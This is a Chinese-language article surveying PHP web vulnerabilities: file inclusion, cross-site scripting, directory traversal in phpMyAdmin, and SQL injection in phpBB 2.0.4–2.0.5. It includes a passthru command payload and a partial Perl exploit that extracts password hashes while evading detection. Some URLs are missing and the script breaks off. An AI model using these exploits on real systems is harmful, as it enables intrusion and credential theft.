常見php頁面漏洞分析及相關問題解決

才智咖 人氣:7.84K

從現在的網路安全來看,大家最關注和接觸最多的WEB頁面漏洞應該是ASP了,在這方面,小竹是專家,我沒發言權.然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多.在這裡,就跟大家來稍微的討論一下PHP頁面的相關漏洞吧.

常見php頁面漏洞分析及相關問題解決

我對目前常見的PHP漏洞做了一下總結,大致分為以下幾種:包含檔案漏洞,指令碼命令執行漏洞,檔案洩露漏洞,SQL注入漏洞等幾種.當然,至於COOKIE欺騙等一部分通用的技術就不在這裡討論了,這些資料網上也很多.那麼,我們就一個一個來分析一下怎樣利用這些漏洞吧!

首先,我們來討論包含檔案漏洞.這個漏洞應該說是PHP獨有的吧.這是由於不充分處理外部提供的惡意資料,從而導致遠端攻擊者可以利用這些漏洞以WEB程序許可權在系統上執行任意命令.我們來看一個例子:假設在中有這樣一句程式碼:

include($include."/");

?>

在這段程式碼中,$include一般是一個已經設定好的路徑,但是我們可以通過自己構造一個路徑來達到攻擊的目的.比方說我們提交:,這個web是我們用做攻擊的空間,當然,也就是我們用來攻擊的程式碼了.我們可以在中寫入類似於:passthru("/bin/ls /etc");的程式碼.這樣,就可以執行一些有目的的攻擊了.(注:web伺服器應該不能執行php程式碼,不然就出問題了.相關詳情可以去看<<如何對php程式中的常見漏洞進行攻擊>>).在這個漏洞方面,出狀況的很多,比方說:PayPal Store Front,

HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.

接著,我們再來看一下指令碼命令執行漏洞.這是由於對使用者提交的URI引數缺少充分過濾,提交包含惡意HTML程式碼的資料,可導致觸發跨站指令碼攻擊,可能獲得目標使用者的敏感資訊。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的程式碼來達到攻擊的目的:

http://web/在script裡面我們可以建構函式來獲得使用者的一些敏感資訊.在這個漏洞方面相對要少一點,除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.

再然後,我們就來看看檔案洩露漏洞了.這種漏洞是由於對使用者提交引數缺少充分過濾,遠端攻擊者可以利用它進行目錄遍歷攻擊以及獲取一些敏感資訊。我們拿最近發現的`phpMyAdmin來做例子.在phpMyAdmin中,頁面沒有對使用者提交的what引數進行充分過濾,遠端攻擊者提交包含多個../字元的資料,便可繞過WEB ROOT限制,以WEB許可權檢視系統上的任意檔案資訊。比方說打入這樣一個地址: 就可以達到檔案洩露的目的了.在這方面相對多一點,有:myPHPNuke,McNews等等.

最後,我們又要回到最興奮的地方了.想想我們平時在asp頁面中用SQL注入有多麼爽,以前還要手動注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然後再開做出NBSI以後,我們NB聯盟真是拉出一片天空.曾先後幫CSDN,大富翁論壇,中國頻道等大型網站找出漏洞.(這些廢話不多說了,有點跑題了...).還是言規正傳,其實在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個函式就好了.將asc改成ASCII,len改成LENGTH,其他函式基本不變了.其實大家看到PHP的SQL注入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網這樣的論壇在asp界就該是漏洞這王了,這並不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發現的安全漏洞也就越多了B也是一樣的,現在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏洞也是一直在出,從最早 phpBB 1.4.0版本被人發現漏洞,到現在最近的phpBB 2.0.6版本的,以及之前發現的,,等等加起來,大概也有十來個樣子吧.這也一直導致,一部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以後的PHPBB會越來越好.

好了,我們還是來分析一下漏洞產生的原因吧.拿頁面來說,由於在呼叫時,直接從GET請求中獲得"topic_id"並傳遞給SQL查詢命令,而並沒有進行一些過濾的處理,攻擊者可以提交特殊的SQL字串用於獲得MD5密碼,獲得此密碼資訊可以用於自動登入或者進行暴力破解。(我想應該不會有人想去暴力破解吧,除非有特別重要的原因).先看一下相關原始碼:

# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )

# {

# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);

# }

# else if ( isset($HTTP_GET_VARS[topic]) )

# {

# $topic_id = intval($HTTP_GET_VARS[topic]);

# }

從上面我們可以看出,如果提交的view=newest並且sid設定了值的話,執行的查詢程式碼像下面的這個樣子(如果你還沒看過PHPBB原始碼的話,建議你看了再對著這裡來看,受影響系統為:phpBB 2.0.5和phpBB 2.0.4).

# $sql = "SELECT _id

# FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u

# WHERE ion_id = $session_id

# AND _id = ion_user_id

# AND c_id = $topic_id

# AND _time >= _lastvisit

# ORDER BY _time ASC

# LIMIT 1";

Rick提供了下面的這斷測試程式碼:

use IO::Socket;

$remote = shift || localhost;

$view_topic = shift || /phpBB2/;

$uid = shift || 2;

$port = 80;

$dbtype = mysql4; # mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype";

$p = "";

for($index=1; $index<=32; $index++)

{

$socket = IO::Socket::INET->new(PeerAddr => $remote,

PeerPort => $port,

Proto => "tcp",

Type => SOCK_STREAM)

or die "Couldnt connect to $remote:$port : $@";

$str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0";

print $socket $str;

print $socket "Cookie: phpBB2mysql_sid=1"; # replace this for pgsql or remove it

print $socket "Host: $remote";

while ($answer = <$socket>)

{

if ($answer =~ /location:.*x23(d+)/) # Matches the location: #

{

$p .= chr ();

}

}

close($socket);

}

print "MD5 Hash for uid $uid is $p";

# random encode str. helps avoid detection

sub random_encode

{

$str = shift;

$ret = "";

for($i=0; $i

TAGS:PHP 頁面 漏洞